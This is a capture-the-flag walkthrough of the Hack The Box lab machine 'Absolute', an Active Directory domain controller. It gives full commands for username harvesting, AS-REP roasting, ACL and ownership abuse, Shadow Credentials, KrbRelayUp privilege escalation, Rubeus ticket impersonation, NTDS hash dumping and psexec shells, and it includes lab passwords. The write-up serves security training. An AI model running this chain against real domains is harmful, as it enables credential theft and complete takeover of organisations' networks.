Absolute involved extracting usernames from image’s meta data, using a tool named anarchy
to generate pattern for generating usernames, using kerbrute
to find valid usernames, we’ll get a user d.klay
who has pre-authentication disabled leading to AS-REP roasting, cracking the hash the credentials won’t work as NTLM auth is disabled, generating a TGT will give us access to LDAP ,through which we can get svc_smb
’s password from the user’s description, with this user Shared
SMB share can be accessed, having compiler.sh
and test.exe
, from wireshark traffic can be analyzed for the exe that it’s authenticating on ldap with m.lovegod’s credentials, with this account we can enumerate the domain through python-bloodhound
, showing that we can get winrm_user
by abusing GenericWrite
to perform a technique called Shadow Credentials
, with this account we can get a session through WinRM, running winpeas
reveals that this machine is vulnerable to KrbRelayUP
giving us access to administrator user.
NMAP
Nmap scan report for 10.10.11.181
Host is up (0.11s latency).
Not shown: 65508 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Absolute
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-25 02:06:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-09T08:14:24
| Not valid after: 2023-06-09T08:14:24
| MD5: bfc0 67ac a80d 4a43 c767 70e3 daac 4089
|_SHA-1: d202 0dbd 811c 7e36 ad9e 120b e6eb a110 8695 f3f7
|_ssl-date: 2022-09-25T02:08:58+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-09T08:14:24
| Not valid after: 2023-06-09T08:14:24
| MD5: bfc0 67ac a80d 4a43 c767 70e3 daac 4089
|_SHA-1: d202 0dbd 811c 7e36 ad9e 120b e6eb a110 8695 f3f7
|_ssl-date: 2022-09-25T02:08:58+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Issuer: commonName=absolute-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
54894/tcp open msrpc Microsoft Windows RPC
PORT 445 (SMB)
Checking for anonymous login for smb share but it doesn’t list any shares
PORT 80 (HTTP)
The site only shows a static page with nothing to interact it, so fuzzing for files and directories with gobuster
So now fuzzing for subdomain or vhost with wfuzz
This didn’t find anything, going back to the site, we can see that there are some images which doesn’t show anything meaningful but if check the exif data it does reveal usernames
We can try grabbing the usernames from all images using exiftool with oneliner
exiftool *.jpg | grep Author | awk {'print $3,$4'}
We have usernames but we need to figure out which format is used for usernames on the domain like the username could be in format of firstname.lastname, first initial.lastname and so on for that I used a tool called Username Anarchy
username-anarchy -i ./names.txt -f firstlast,first.last
Foothold (d.klay)
Now that have the usernames in format, we can use kerbrute
to see which usernames exist in domain if we have generated the names in a proper format
kerbrute userenum ./generated_names.txt -d absolute.htb --dc 10.10.11.181
From the output we can see kerbrute tried to authenticate and it found d.klay
doesn't have pre-authentication enabled which led to AS-REP roasting, before we go cracking this hash, hashcat
doesn't support cracking etype 18 so we need to use impacket's GetNPUsers
python3 GetNPUsers.py absolute.htb/uwu@dc.absolute.htb -
erated_names.txt -request
This hash can now be cracked with hashcat as it supports etype 23
hashcat -a 0 -m 18200 ./hash.txt /opt/SecLists/Passwords/rockyou.txt --force
I tried using the credentials on rpc and smb but got an account restriction error
Credentials didn’t worked on ldap as well, I tried password spraying which should that none of the valid usernames are allowed on smb
So this could mean that NTLM authentication is disabled, let’s try using kerberos based authentication and for that we’ll need d.klay’s TGT with getTGT
from impacket script
python3 getTGT.py absolute.htb/d.klay
Now using smbclient.py
from impacket we can perform kerberos authentication to list shares
python3 smbclient.py absolute.htb/d.klay@dc.absolute.htb -k -no-pass -debug
But it shows a clock skew error which means that we need to synchronize our time with domain controller
sudo ntpdate 10.10.11.181
The only shares that were accessible by this user were NETLOGON
and SYSVOL
which doesn't seem to have anything interesting, logging in through rpcclient
with kerberos auth by setting up krb5.conf
[libdefaults] default_realm = ABSOLUTE.HTB
[realms]
ABSOLUTE.HTB = {
kdc = 10.10.11.181
}
We can get more users through enumdomusers
rpcclient -U absolute.htb/d.klay dc.absolute.htb -k
I checked if there wasn’t pre-auth flag set on the new users we got
Privilege Escalation (svc_smb)
Which wasn’t the case, I decided to go back and check ldap through kerberos auth and needed to update cme as it was giving an error on ldap
Now checking if we can access ldap
poetry run crackmapexec ldap 10.10.11.181 -k --kdcHost dc.absolute.htb --user
We have the password for svc_smb
user which is AbsoluteSMBService123!
, we need to generate TGT again for this user to access smb and see which shares we can access now
Listing shares with cme we can see that this user can acess Shared
From shared, we see two files
From compile.sh
it seems that it's compiled in nim
Running the exe on windows machine, it doesn’t show any output
Adding host name in c:\windows\system32\drivers\etc\hosts
Privilege Escalation (m.lovegod)
After adding the hostname, if we check wireshark after running the exe, we’ll see that it’s try to connect to LDAP using credentials
On opening the packet, we’ll get the password for m.lovegod
which is AbsoluteLDAP2022!
This user didn’t gave us any special access, seeing a tweet from JazzPizazz during the box release, he modified python bloodhound to work with kerberos authentication
python3 bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -no-pass -c
all -ns 10.10.11.181
This worked and we have domain data which we can import it on bloodhound
Checking in which group is m.lovegod part of
Here we see that he is a member of three groups where Networkers
looks like a custom group, if we enumerate this group
It has WriteOwner
permissions on Network Audit
object, further looking into that group it has GenericWrite
on winrm_user
So the path we need to follow is, m.lovegod is a part of networkers group and has WriteOwner ACL, we can become owner of that group,and grant permissions to add members in Network Audit group and then we can add a SPN to winrm_user and then kerberoast it which is known as targeted kerberoasting.
But the problem is we don’t have a shell and for doing that we need powerview
or ADModule
so I tried powerview.py
and ldap_shell
but they didn’t worked but ldapsearch
was working and we see key credential property which we abuse as well
ldapsearch -LLL -Y GSSAPI -H ldap://dc.absolute.htb -b "dc=absolute,dc=htb"
I saw a tweet from Shutdown
sharing a branch of impacket through which we can abuse WriteOwner and WriteDACL absue
Further digging into it, I found a resource for abusing WriteOwner using the author’s script
But this script isn’t merged with the current impacket repo, so we need to create a python virtual environment and install impacket so that it doesn’t mess up with the current impacket installed
Having the pthon virtual environment created clone the repo
git clone --branch dacledit https://github.com/ShutdownRepo/impacket.git
Copy the owneredit.py
by from owneredit branch and install impacket
Once it’s installed with owneredit
we are going to make m.lovegod the owner of network audit group
python3 ./owneredit.py -action write -target 'NETWORK AUDIT' -new-owner 'm.lovegod' 'absolute.htb'/'m.lovegod' -k -no-pass -dc-ip 10.10.11.181
Privilege Escalation (winrm_user)
Now being the owner of aduit group we can give full control to m.lovegod to do anything with the group like adding group members so that m.lovegod can have generic write on win_rm user
python3 dacledit.py -action 'write' -rights 'FullControl' -principal 'm.lovegod' -target 'NETWORK AUDIT' 'absolute.htb'/'m.lovegod' -k -no-pass -dc-ip 10.10.11.181
All that is left is to add m.lovegod to audit group with net rpc
net rpc group addmem 'Network Audit' 'm.lovegod' -U absolute.htb/m.lovegod -S dc.absolute.htb -k
We need to get the TGT again as the permissions or configurations will be revoked
With targeted kerberoasting
we can add SPN to winrm_user and request for a TGS
python3 ./targetedKerberoast.py -d absolute.htb -u m.lovegod --dc-ip 10.10.11.181 -k --no-pass -v
But this hash was not crackable, All this could be done with windows as well machine, first synchronie time with DC, we can do it with w32tm
but we do need to start the service
net start w32time
w32tm /config /manualpeerlist:dc.absolute.htb /syncfromflags:MANUAL /reliable:yes /update
Now having synchronized with the domain controller we can use PowerView
but for that we needed to make some configurations in host file and the openvpn adapter because without that it won't work properly and will show this
$SecPassword = ConvertTo-SecureString 'AbsoluteLDAP2022!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)
So to make this work we need to add the domain controller’s IP as the DNS server in openvpn adapter’s settings
Make sure dc.absolute.htb isn’t in the hosts file
And now our powerview commands will work
Since I am on a windows machine and I had previously made m.lovegod the owner of network audit group but I did that on linux and a day was passed since I had done that so chances are that might have been revoked so I’ll just do that powerview
Set-DomainObjectOwner -Credential $Cred -Identity "NETWORK AUDIT" -OwnerIdentity "m.lovegod" -Domain 'absolute.htb'-DomainController dc.absolute.htb -V
Now giving him the full control again
Add-DomainObjectAcl -TargetIdentity "NETWORK AUDIT" -PrincipalIdentity m.lovegod -Rights All -Verbose -Credential $Cred -Domain 'absolute.htb'
Now adding m.lovegod in network audit’s group so that we can abuse generic write by doing targeted kerberoasting
Add-DomainGroupMember -Identity 'NETWORK AUDIT' -Members 'm.lovegod' -Domain 'absolute.htb' -Credential $Cred -Verbose
We can verfiy if m.lovegod is added in the group
Now when setting the SPN for winrm_user, it wasn’t working probably because of clean up script doing their job but not really sure why it didn’t worked as I was providing the command one after the other
Set-DomainObject -Identity 'winrm_user' -Set @{serviceprincipalname='MSSQL/UwU'} -Domain 'absolute.htb' -DomainController dc.absolute.htb -Credential $Cred -Verbose
So what we can do is, repeat the same process by making m.lovegod the owner of audit group, give full control, add m.lovegod into the audit group and then generate TGT, this will retain the configurations or the session regardless of what we have configured being removed
Checking if the ticket has been loaded
But targeted kerborasting wasn’t the way, since there’s GenericWrite on winrm_user we can update msDS-KeyCredentialLink
allowing us to perform Shadow Credentials using PyWhisker
python3 ./pywhisker.py -a add --dc-ip 10.10.11.181 -d absolute.htb -u 'm.lovegod' -k --no-pass -t winrm_user
Following PKINIT tools we can request for a TGT and then with that we can get the NTHash but for that we need to have minikerberos
installed
python3 ./gettgtpkinit.py -cert-pfx ../pywhisker/luUEOlxx.pfx -pfx-pass p9nq1oiCzfgRbOWKMZWQ absolute.htb/winrm_user winrm_user.ccache
Export the TGT ticket
python3 ./getnthash.py -key 1b9d937e95c70cc1dd37ad5c67be8d6ff7617fb8438d012236e0f4b3e1cb1e91 absolute.htb/winrm_user
This can also be doing through rubeus by transferring the pfx file and asking for a TGT with the NTHash
Rubeus.exe asktgt /user:winrm_user /certificate:luUEOlxx.pfx /password:p9nq1oiCzfgRbOWKMZWQ /domain:absolute.htb /domaincontroller:dc.absolute.htb /getcredentials /show
We can’t really do much with the NThash but TGT can be helpful, we can use that on WinRM to get a shell for that I found a ruby script which works with kerberos for winrm
After cloning the repo I again ran into a problem
winrm_kerb_shell.rb -s dc.absolute.htb -r ABSOLUTE.HTB
This can be resolved by following this which tells to add the domain name in capital in the hosts file
Now the script works perfectly
After authenticating with winrm service this will save the service principal for winrm and we can use evil-winrm
evil-winrm -i dc.absolute.htb -r ABSOLUTE.HTB
We can run winpeas on the machine since defender is disabled and on running we’ll see that it shows system is vulnerable to krbrealyUP
We can abuse this by following this post, to compile krblreayup we need to use VS studio, after compiling we can transfer the executable on the target machine
By following the blog post we can abuse shadow credentials through Krbrelayup, on running that it wasn’t working so probably we need other cls ID
We can check for different clsids from here
Privilege Escalation (Administrator)
This time we get an access denied so we have gotten the clsid correct but it isn’t accessible so probably we’ll need a different user to run this exe with like m.lovegod. But issue was running exe with a different user was pain as I tried Invoke-Command and some Runas scripts which didn’t worked but the one which did work was RunasCS
RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb 'C:\Users\winrm_user\Documents\KrbRelayUp.exe full -m shadowcred --ForceShadowCred -cls 3c6859ce-230b-48a4-be6c-932c0c202048' -l 9
Now using Rubeus to get TGT for DC$
machine account with the generated certificate
.\Rubeus.exe asktgt /user:DC$ /certificate:cert /password:password /enctype:AES256 /nowra
Having the ticket we can now impersonate as the administrator user with a S4U
.\Rubeus.exe s4u /self /user:DC$ /impersonateuser:administrator /msdsspn:host/dc.absolute.htb /ticket:kirbi_ticket
Converting the administrator’s .kirbi ticket to ccache so that we can use it with impacket scripts
echo "kirbiticket" | base64 -d > kirbiticket.kirb
Converting it into ccache ticket with ticketconverter
ticketConverter.py kirbiticket.kirbi ticket.ccache
Having the administrator’s TGT we can dump the SAM and NTDS.dit hashes
secretsdump.py absolute.htb/administrator@dc.absolute.htb -k -no-pass
And now we can use any of the execs from impacket, I used psexec
to get a shell
psexec.py -k -no-pass absolute.htb/administrator@dc.absolute.htb
References
- https://github.com/urbanadventurer/username-anarchy
- https://hashcat.net/wiki/doku.php?id=example_hashes
- https://python-poetry.org/docs/#installing-with-the-official-installer
- https://wiki.porchetta.industries/getting-started/installation/installation-on-unix
- https://itnursery.com/ldapsearch-and-kerberos-authentication/
- https://twitter.com/PizazzJazz/status/1574360409846337537?t=uQ32qRfo2Cl5M5lCDJCGuA&s=19
- https://github.com/jazzpizazz/BloodHound.py-Kerberos
- https://www.thehacker.recipes/ad/movement/dacl/grant-rights
- https://www.thehacker.recipes/ad/movement/dacl/grant-ownership
- https://twitter.com/_nwodtuhs/status/1525527323667218432?lang=en
- https://github.com/ShutdownRepo/impacket/tree/owneredit
- https://github.com/ShutdownRepo/impacket/tree/dacledit
- https://community.spiceworks.com/how_to/160048-work-with-ntp-via-powershell
- https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
- https://github.com/ShutdownRepo/pywhisker
- https://github.com/dirkjanm/PKINITtools
- https://github.com/skelsec/minikerberos
- confluentinc/librdkafka#2117
- https://forum.hackthebox.com/t/simple-winrm-shell-via-kerberos/1870
- https://stackoverflow.com/questions/18760281/how-do-i-increase-the-scrollback-buffer-size-in-tmux
- https://github.com/DarkCoderSc/run-as
- https://notes.vulndev.io/notes/redteam/payloads/windows
- https://icyguider.github.io/2022/05/19/NoFix-LPE-Using-KrbRelay-With-Shadow-Credentials.html
- https://github.com/Dec0ne/KrbRelayUp
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato
- https://github.com/antonioCoco/RunasCs
- https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro/